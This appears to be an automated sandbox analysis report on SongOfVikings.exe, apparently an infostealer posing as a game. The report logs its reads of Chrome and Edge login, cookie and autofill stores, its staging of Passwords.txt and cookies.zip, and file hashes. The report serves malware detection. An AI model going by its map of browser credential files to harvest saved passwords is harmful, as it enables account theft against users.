Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\cookies.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Autofills.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Passwords.txt VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation

Source: C:\Users\user\Desktop\SongOfVikings.exe

0_2_0040338F

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

ID:	1416898
Product:	CloudBasic
Start time:	09:21:18
Start date:	28.03.2024
Sample:	SongOfVikings.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	e66fb39c07d4e01d713fbac743f4ced7
SHA1:	6dec3465aef1404f63e939cbb03104bf1d476e97
SHA256:	0aed87372c8b6418f78abe020549e227175cae65f01713357afdbb7f7a839a34
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\D3DSCache\4f71bded7e2eff50\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx	data	1E9F412ABA5AE0D726C0C3E7381965AC	BF9E3A7AB1736F451C1CCA9FC4E2A46357E747AE	64E3F104534118D69C7E3BB3D9325B95BE57C7422F6DA55EEADCAC7F848D0284
C:\Users\user\AppData\Local\D3DSCache\4f71bded7e2eff50\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock	ASCII text, with no line terminators	F49655F856ACB8884CC0ACE29216F511	CB0F1F87EC0455EC349AAA950C600475AC7B7B6B	7852FCE59C67DDF1D6B8B997EAA1ADFAC004A9F3A91C37295DE9223674011FBA
C:\Users\user\AppData\Local\D3DSCache\4f71bded7e2eff50\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val	Matlab v4 mat-file (little endian) (, numeric, rows 0, columns 16, imaginary	9D921A3D89F719D8C0BC89D0C2935CEE	C5D0590AE7B540AA156B4E40D568633B24E8B2B4	4A73A4FB7B8E70A9D4E094D48A6DF216EBD7306427B164E4786AB57D8933246C
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	28591AA4E12D1C4FC761BE7C0A468622	BC4968A84C19377D05A8BB3F208FBFAC49F4820B	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\passwords.db	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1	349E6EB110E34A08924D92F6B334801D	BDFB289DAFF51890CC71697B6322AA4B35EC9169	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\webdata.db	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	221856DA47C54F6C628B6AF3FD54240F	93298F5F6119F79FE78BA78F43C6AF34B065F11F	4F44EF640AFDB35DB4DA738D29F3D6ED460E19BC77D13BB59CF089628E5074DC
C:\Users\user\AppData\Local\Programs\SongOfVikings\LICENSE.electron.txt	ASCII text	4D42118D35941E0F664DDDBD83F633C5	2B21EC5F20FE961D15F2B58EFB1368E66D202E5C	5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
C:\Users\user\AppData\Local\Programs\SongOfVikings\LICENSES.chromium.html	HTML document, ASCII text	8303B3A19888F41062A614CD95B2E2D2	A112EE5559C27B01E3114CF10050531CAB3D98A6	9C088CAAC76CF5BE69E0397D76FE9397017585CFFDBA327692FF1B3A6C00D68F
C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	PE32+ executable (GUI) x86-64, for MS Windows	B70DAA1BF6AF8358653105CA09FD384B	15331D91C4CE89B4793DB30DB231D5C2F4A49154	3E37C0719447793C4E7F4CD1CE91291F2B6C71C3F3C4C4D2D1ED94E54333BE98
C:\Users\user\AppData\Local\Programs\SongOfVikings\chrome_100_percent.pak	data	ACD0FA0A90B43CD1C87A55A991B4FAC3	17B84E8D24DA12501105B87452F86BFA5F9B1B3C	CCBCA246B9A93FA8D4F01A01345E7537511C590E4A8EFD5777B1596D10923B4B
C:\Users\user\AppData\Local\Programs\SongOfVikings\chrome_200_percent.pak	data	4610337E3332B7E65B73A6EA738B47DF	8D824C9CF0A84AB902E8069A4DE9BF6C1A9AAF3B	C91ABF556E55C29D1EA9F560BB17CC3489CB67A5D0C7A22B58485F5F2FBCF25C
C:\Users\user\AppData\Local\Programs\SongOfVikings\d3dcompiler_47.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	2191E768CC2E19009DAD20DC999135A3	F49A46BA0E954E657AAED1C9019A53D194272B6A	7353F25DC5CF84D09894E3E0461CEF0E56799ADBC617FCE37620CA67240B547D
C:\Users\user\AppData\Local\Programs\SongOfVikings\ffmpeg.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	A007299C49FA50AEFF594655859780AE	D202F1F617023763A0E9418878E8ECAC96BE9FD4	B78F0036621AD1D5833289F2AD509963EF78F1A89A3C7DF0F1370FD2D35A2804
C:\Users\user\AppData\Local\Programs\SongOfVikings\icudtl.dat	data	2134E5DBC46FB1C46EAC0FE1AF710EC3	DBECF2D193AE575ABA4217194D4136BD9291D4DB	EE3C8883EFFD90EDFB0FF5B758C560CBCA25D1598FCB55B80EF67E990DD19D41
C:\Users\user\AppData\Local\Programs\SongOfVikings\libEGL.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	CA5BB0794B7700601E9438283D458665	7FCF090B19820B9450937BE800575C526448B581	4A8BE3B4D9FE790EFDCE38CFF8F312A2F8276908D6703E0C6C37818E217CF1E3
C:\Users\user\AppData\Local\Programs\SongOfVikings\libGLESv2.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	05B585464F18FE0E3BDDB20527697D66	8BCEC2F0B409AFA9FF054E25F3CE85EB9BD50010	0BB7C6C08B569C1D2DE90A40E6C142591E160A7C6CB15D21807F3404A48C4287
C:\Users\user\AppData\Local\Programs\SongOfVikings\resources.pak	data	31C7D4B11AD95DFE539DD098E0FAB736	5418682D939CE8485ECC9125B872C14FFEC662C2	A251019EB08F1E695E935D224544BDA37C5AE092BA68A89FA1FE3BD19BDE4F5C
C:\Users\user\AppData\Local\Programs\SongOfVikings\snapshot_blob.bin	data	4EBD06BDF6CF8DACF6597586FD1704B5	E6819EF37F99F91468F4B94370A4AB467A075A6D	148E4B85983F0D27ADECD9C6431B66379AC5538688F320E89D74FF6D48BB740B
C:\Users\user\AppData\Local\Temp\Autofills.txt	ASCII text	08DC8720082B2EDE1EC6E33339F189C1	E1B7E75D052D2AD60F42D400E968A5E9AA91481D	1DE83568C3158F5B5E9AE372D31453115A5C166EB83692A6C94EA6C7E1E0387C
C:\Users\user\AppData\Local\Temp\Passwords.txt	ASCII text, with no line terminators	C4EFD9A7B61EBF43B608440BE5E33369	926418256C277F1B11B575EC6E92CE6A844612F7	ED4280859199DA5A8F25C0C6D533D0873460AC63368C14A69BBD863EA4BFB30F
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00nhm3k0.jd3.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_450tslt1.d1s.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_stjnkdip.2aw.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xyw4kuvx.1rf.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\cookies.zip	Zip archive data, at least v2.0 to extract, compression method=deflate	6ED7DB513220DCD7CE12D8FEC8B99BC9	63A50C14BFD8D7F42694A48AFF8A8A81E9B8B82F	8FD9D0AF5F1C8830B811D318AF2D41BDD4E12009C31B3C69C696F0D8BC32AF9C
C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0.zip	Zip archive data, at least v2.0 to extract, compression method=store	9D8DC4FF3CBDCCDF471A124B638F6ABF	261CFC4765FDA4EBCFF3A43C9AA04E077F532AB2	48D06ACCF28572B53CB870EBD33920680A2CDE8A05C8F796E0B3D5873667F2A7
C:\Users\user\AppData\Local\Temp\db56a95c-619a-410d-ad51-8448947b0929.tmp.node	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	04BFBFEC8DB966420FE4C7B85EBB506A	939BB742A354A92E1DCD3661A62D69E48030A335	DA2172CE055FA47D6A0EA1C90654F530ABED33F69A74D52FAB06C4C7653B48FD
C:\Users\user\AppData\Local\Temp\f1a1d769-375b-46b2-ad93-df5ca2abe3a4.tmp.node	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	EAD879942C7F8C53ACA1AA9B8F969564	05856F95D9A584F235E84CB178B5EB28D974876D	92FB3A1AD9A45392F022925B79D56E269F80B697A46FFE05BB3DF156105F2573
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\LICENSE.electron.txt	ASCII text	4D42118D35941E0F664DDDBD83F633C5	2B21EC5F20FE961D15F2B58EFB1368E66D202E5C	5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\LICENSES.chromium.html	HTML document, ASCII text	8303B3A19888F41062A614CD95B2E2D2	A112EE5559C27B01E3114CF10050531CAB3D98A6	9C088CAAC76CF5BE69E0397D76FE9397017585CFFDBA327692FF1B3A6C00D68F
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\SongOfVikings.exe	PE32+ executable (GUI) x86-64, for MS Windows	B70DAA1BF6AF8358653105CA09FD384B	15331D91C4CE89B4793DB30DB231D5C2F4A49154	3E37C0719447793C4E7F4CD1CE91291F2B6C71C3F3C4C4D2D1ED94E54333BE98
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\chrome_100_percent.pak	data	ACD0FA0A90B43CD1C87A55A991B4FAC3	17B84E8D24DA12501105B87452F86BFA5F9B1B3C	CCBCA246B9A93FA8D4F01A01345E7537511C590E4A8EFD5777B1596D10923B4B
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\chrome_200_percent.pak	data	4610337E3332B7E65B73A6EA738B47DF	8D824C9CF0A84AB902E8069A4DE9BF6C1A9AAF3B	C91ABF556E55C29D1EA9F560BB17CC3489CB67A5D0C7A22B58485F5F2FBCF25C
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\d3dcompiler_47.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	2191E768CC2E19009DAD20DC999135A3	F49A46BA0E954E657AAED1C9019A53D194272B6A	7353F25DC5CF84D09894E3E0461CEF0E56799ADBC617FCE37620CA67240B547D
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\ffmpeg.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	A007299C49FA50AEFF594655859780AE	D202F1F617023763A0E9418878E8ECAC96BE9FD4	B78F0036621AD1D5833289F2AD509963EF78F1A89A3C7DF0F1370FD2D35A2804
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\icudtl.dat	data	2134E5DBC46FB1C46EAC0FE1AF710EC3	DBECF2D193AE575ABA4217194D4136BD9291D4DB	EE3C8883EFFD90EDFB0FF5B758C560CBCA25D1598FCB55B80EF67E990DD19D41
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\libEGL.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	CA5BB0794B7700601E9438283D458665	7FCF090B19820B9450937BE800575C526448B581	4A8BE3B4D9FE790EFDCE38CFF8F312A2F8276908D6703E0C6C37818E217CF1E3
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\libGLESv2.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	05B585464F18FE0E3BDDB20527697D66	8BCEC2F0B409AFA9FF054E25F3CE85EB9BD50010	0BB7C6C08B569C1D2DE90A40E6C142591E160A7C6CB15D21807F3404A48C4287
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\af.pak	data	7E51349EDC7E6AED122BFA00970FAB80	EB6DF68501ECCE2090E1AF5837B5F15AC3A775EB	F528E698B164283872F76DF2233A47D7D41E1ABA980CE39F6B078E577FD14C97
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\am.pak	data	C6EF9C40B48A069B70ED3335B52A9A9C	D4A5FB05C4B493ECBB6FC80689B955C30C5CBBB4	73A1034BE12ABDA7401EB601819657CD7ADDF011BFD9CE39F115A442BCCBA995
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\ar.pak	data	56F6DC44CC50FC98314D0F88FCC2A962	B1740B05C66622B900E19E9F71E0FF1F3488A98E	7018884D3C60A9C9D727B21545C7DBBCC7B57FA93A16FA97DECA0D35891E3465
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\bg.pak	data	945DE8A62865092B8100E93EA3E9828D	18D4C83510455CE12A6AC85F9F33AF46B0557E2E	F0E39893A39CE6133C1B993F1792207830B8670A6EB3185B7E5826D50FEA7BA2
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\bn.pak	data	8FEB4092426A0C2C167C0674114B014D	6FC9A1076723BFAF5301D8816543A05A82AD654D	FB0656A687555801EDFB9442B9F3E7F2B009BE1126F901CF4DA82D67AC4AD954
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\ca.pak	data	01ACD6F7A4EA85D8E63099CE1262FBAD	F654870D442938385B99444C2CACD4D6B60D2A0D	B48D1BAD676F2E718CBE548302127E0B3567913A2835522D6DD90279A6D2A56A
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\cs.pak	data	A934431D469D19A274243F88BB5AC6FB	146845EDC7442BF8641BC8B6C1A7E2C021FB01EB	51C36A5ACDAD5930D8D4F1285315E66B2578F27534D37CD40F0625EE99852C51
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\da.pak	data	BB5252DC6F0F3C01CE3638138BF946C8	BFB584B67C8CA51D94BFF40809410553D54DA1CF	C93F39D0AB9A2FAB26977AA729261633225879BA6DC5EA8D0CA89814B2DF9FA9
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\de.pak	data	ED329B35D10E81F55D611FE8748876F8	0D998732BB4C4D1FAAD5A5BC0A21D6C5672418D3	6FACD562ADD58C4684EF4A40DE9B63581FEA71C5B83049ED8A2C2A2C929C45CE
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\el.pak	data	6922AAA87431699787C1489E89AF17B9	6FB7771C9271CA2EEEBE025A171BFA62DB3527F7	800545F9134914649DA91B90E7DF65D8208014C3E12F2BE551DFD6722BF84719
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\en-GB.pak	data	0DB7F3A3BA228AA7F2457DB1AA58D002	BBF3469CAADFA3D2469DD7E0809352EF21A7476D	CF5ACA381C888DE8AA6BBD1DCD609E389833CB5AF3F4E8AF5281FFD70CD65D98
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\en-US.pak	data	5E3813E616A101E4A169B05F40879A62	615E4D94F69625DDA81DFAEC7F14E9EE320A2884	4D207C5C202C19C4DACA3FDDB2AE4F747F943A8FAF86A947EEF580E2F2AEE687
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\es-419.pak	data	5321C1E88C5C6FA20BDBC16043C6D0F6	07B35ED8F22EDC77E543F28D36C5E4789E7723F4	F7CAA691599C852AFB6C2D7B8921E6165418CC4B20D4211A92F69C877DA54592
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\es.pak	data	E9FA4CADA447B507878A568F82266353	4A38F9D11E12376E4D13E1EE8C4E0D082D545701	186C596D8555F8DB77B3495B7AD6B7AF616185CA6C74E5DFB6C39F368E3A12A4
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\et.pak	data	A94E1775F91EA8622F82AE5AB5BA6765	FF17ACCDD83AC7FCC630E9141E9114DA7DE16FDB	1606B94AEF97047863481928624214B7E0EC2F1E34EC48A117965B928E009163
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\fa.pak	data	DCD3B982A52CDF8510A54830F270E391	3E0802460950512B98CD124FF9F1F53827E3437E	E70DFA2D5F61AFE202778A3FAF5ED92B8D162C62525DB79D4EC82003D8773FA3
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\fi.pak	data	5518B51D4AF7F1B9D686CBEA28B69E71	DF7F70846F059826C792A831E32247B2294C8E52	8FF1B08727C884D6B7B6C8B0A0B176706109AE7FE06323895E35325742FE5BD1
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\fil.pak	data	3165351C55E3408EAA7B661FA9DC8924	181BEE2A96D2F43D740B865F7E39A1BA06E2CA2B	2630A9D5912C8EF023154C6A6FB5C56FAF610E1E960AF66ABEF533AF19B90CAA
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\fr.pak	data	0445700799DE14382201F2B8B840C639	B2D2A03A981E6FF5B45BB29A594739B836F5518D	9A57603F33CC1BE68973BDD2022B00D9D547727D2D4DC15E91CC05EBC7730965
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\gu.pak	data	7B5F52F72D3A93F76337D5CF3168EBD1	00D444B5A7F73F566E98ABADF867E6BB27433091	798EA5D88A57D1D78FA518BF35C5098CBEB1453D2CB02EF98CD26CF85D927707
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\he.pak	data	93D9261F91BCD80D7F33F87BAD35DDA4	A498434FD2339C5D6465A28D8BABB80607DB1B65	31661709AB05E2C392A7FAEED5E863B718F6A5713D0D4BBDAB28BC5FB6565458
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\hi.pak	data	B7E4892B2030E4F916364856B6CC470A	B08AD51E98E3B6949F61F0B9251F7281818CD23E	093119A99F008AB15D0E5B34CD16EC6B4313554E6C3CFFE44502BFCE51470E3E
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\hr.pak	data	105472BC766A30BB71F13D86081DE68D	D014103AD930889239EFD92ECFDFCC669312AF6C	A3A853A049735C7D474191DFF19550A15503ECD20BAFE44938EB12EA60E50B7C
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\hu.pak	data	B338DCB0E672FB7B2910CE2F561A8E38	CF18C82EC89F52753F7258CDB01203FBC49BED99	BCDF39AA7004984CB6C13AAC655B2E43EFEB387CE7D61964B063D6CF37773F7A
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\id.pak	data	BD9636E9C7DC7BE4C7F53FB0B886BE04	55421D0E8EFCBEF8C3B72E00A623FB65D33C953E	5761EE7DA9CA163E86E2023829D377A48AF6F59C27F07E820731192051343F40
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\it.pak	data	7C981A25BE0E02FBA150E17D9669A536	3AF10FEB7CDC7BC091B80173301B1A3D4EF941D4	EE2D2643AD7A8F97B7A6C070910866436CAE0267A6691A3D8A88ED0948D8AF49
